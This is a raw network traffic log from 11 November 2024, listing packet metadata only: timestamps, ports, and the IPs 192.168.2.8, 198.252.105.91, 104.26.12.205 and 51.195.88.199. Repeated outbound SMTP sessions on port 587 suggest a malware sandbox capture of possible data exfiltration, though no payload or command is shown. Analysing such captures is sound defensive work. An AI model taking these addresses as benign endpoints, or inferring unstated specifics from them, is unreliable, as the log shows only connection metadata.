Nov 11, 2024 18:02:29.037170887 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.037178040 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.037203074 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.037220001 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.037316084 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.037331104 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.037370920 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.037378073 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.037386894 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.037401915 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.037408113 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.037424088 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.037431002 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.037445068 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.037468910 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.038038969 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.038057089 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.038101912 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.038110971 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.038122892 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.038145065 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.038147926 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.038176060 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.038182020 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.038201094 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.038225889 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.038266897 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.038281918 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.038315058 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.038321972 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.038340092 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.038361073 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.038917065 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.038933992 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.038985014 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.038995981 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.039017916 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.039031982 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.039036989 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.039047003 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.039068937 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.039099932 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.039102077 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.039113045 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.039127111 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.039145947 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.039169073 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.039174080 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.039210081 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.039239883 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.039256096 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.039288998 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.039297104 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.039328098 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.039335012 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.039799929 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.039836884 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.039882898 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.039891958 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.039906979 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.039910078 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.039933920 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.039937973 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.039944887 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.039961100 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.040003061 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.040100098 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.040115118 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.040148020 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.040154934 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.040169954 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.040170908 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.040189028 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.040194035 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.040203094 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.040220976 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.040254116 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.040606022 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.040658951 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.040666103 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.040700912 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:29.040703058 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.040745974 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.041752100 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:29.041769981 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:38.766844034 CET	49707	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:38.766886950 CET	443	49707	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:38.766967058 CET	49707	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:38.833132982 CET	49707	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:38.833173990 CET	443	49707	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:39.269913912 CET	443	49707	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:39.269984961 CET	49707	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:39.273616076 CET	49707	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:39.273629904 CET	443	49707	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:39.273947954 CET	443	49707	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:39.328066111 CET	49707	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:39.375333071 CET	443	49707	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:39.442462921 CET	443	49707	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:39.442533016 CET	443	49707	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:39.442584991 CET	49707	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:39.448426962 CET	49707	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:40.177681923 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:40.182563066 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:40.182646036 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:41.676111937 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:41.676249981 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:41.676374912 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:41.676502943 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:41.678276062 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:41.679871082 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:41.685956955 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:41.855956078 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:41.856158972 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:41.861263037 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:42.024333954 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:42.024791002 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:42.029669046 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:42.197963953 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:42.198008060 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:42.198019981 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:42.198086023 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:42.198126078 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:42.198126078 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:42.237432003 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:42.242314100 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:42.405952930 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:42.408524990 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:42.413278103 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:42.575736046 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:42.577254057 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:42.582118988 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:42.745040894 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:42.745970011 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:42.750791073 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:42.921231031 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:42.921560049 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:42.926429033 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:43.089274883 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:43.089488983 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:43.094306946 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:43.260293961 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:43.260581970 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:43.265508890 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:43.428107023 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:43.440912008 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:43.441543102 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:43.441601992 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:43.441601992 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:43.445795059 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:43.446327925 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:43.446417093 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:43.446501970 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:43.609699965 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:43.705498934 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:43.862304926 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:43.867070913 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:44.029824972 CET	587	49708	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:44.030209064 CET	49708	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:44.031025887 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:44.035808086 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:44.035872936 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:44.679507017 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:44.679627895 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:44.684345961 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:44.846915960 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:44.847193003 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:44.851999044 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:45.014750004 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:45.017518997 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:45.023564100 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:45.192245007 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:45.192281961 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:45.192296028 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:45.192337036 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:45.193531990 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:45.198256016 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:45.361226082 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:45.387017012 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:45.391870022 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:45.554141998 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:45.554408073 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:45.559168100 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:45.721831083 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:45.722268105 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:45.727139950 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:45.893409967 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:45.894802094 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:45.899710894 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:46.062041998 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:46.083960056 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:46.089035034 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:46.256468058 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:46.259680986 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:46.265336037 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:46.427706003 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:46.439466000 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:46.439605951 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:46.439631939 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:46.439685106 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:46.439728975 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:46.439764977 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:46.439796925 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:46.439829111 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:46.439840078 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:46.439873934 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:46.444468975 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:46.444833994 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:46.444847107 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:46.445363998 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:46.445492029 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:46.445683002 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:46.445693970 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:46.776336908 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:46.829696894 CET	587	49714	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:46.833632946 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:47.977941990 CET	49715	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:47.977988005 CET	443	49715	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:47.978071928 CET	49715	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:47.981322050 CET	49715	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:47.981339931 CET	443	49715	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:48.845771074 CET	443	49715	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:48.845905066 CET	49715	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:48.847665071 CET	49715	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:48.847673893 CET	443	49715	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:48.847929955 CET	443	49715	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:48.902559996 CET	49715	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:48.943329096 CET	443	49715	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:49.023145914 CET	443	49715	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:49.023219109 CET	443	49715	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:49.023272991 CET	49715	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:49.134104967 CET	49715	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:51.169945955 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:51.175049067 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:51.175142050 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:51.852518082 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:51.872674942 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:51.877593040 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:52.040124893 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:52.041109085 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:52.045941114 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:52.208816051 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:52.209321022 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:52.214684010 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:52.382462025 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:52.382567883 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:52.382577896 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:52.382591009 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:52.382622004 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:52.382649899 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:52.384028912 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:52.388884068 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:52.551515102 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:52.555799961 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:52.560621977 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:52.722881079 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:52.723198891 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:52.728144884 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:52.890609980 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:52.890983105 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:52.895873070 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:53.062903881 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:53.071542025 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:53.076587915 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:53.239351988 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:53.239700079 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:53.244720936 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:53.410763025 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:53.410968065 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:53.415805101 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:53.577984095 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:53.578571081 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:53.578632116 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:53.578656912 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:53.578680992 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:53.583467007 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:53.583740950 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:53.746793032 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:53.807986021 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:53.854320049 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:53.859198093 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:54.021842003 CET	587	49716	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:54.022393942 CET	49716	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:54.023463011 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:54.028341055 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:54.028405905 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:54.524229050 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:54.536268950 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:54.541212082 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:54.704108953 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:54.704310894 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:54.709103107 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:54.872011900 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:54.872364044 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:54.877280951 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:55.051533937 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:55.051554918 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:55.051569939 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:55.051661015 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:55.053071976 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:55.057866096 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:55.220465899 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:55.221975088 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:55.226917982 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:55.389219999 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:55.389848948 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:55.394934893 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:55.557538986 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:55.557786942 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:55.562628984 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:55.728130102 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:55.728324890 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:55.733283997 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:55.896684885 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:55.896883965 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:55.901693106 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:56.034493923 CET	49718	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:56.034538031 CET	443	49718	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:56.034616947 CET	49718	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:56.040682077 CET	49718	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:56.040697098 CET	443	49718	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:56.069098949 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:56.069278955 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:56.074278116 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:56.236891985 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:56.237421036 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:56.237536907 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:56.237536907 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:56.237556934 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:56.237611055 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:56.237679958 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:56.237703085 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:56.237735987 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:56.237767935 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:56.237812996 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:56.242290974 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:56.242510080 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:56.242552042 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:56.242717981 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:56.531905890 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:56.535123110 CET	443	49718	104.26.12.205	192.168.2.8
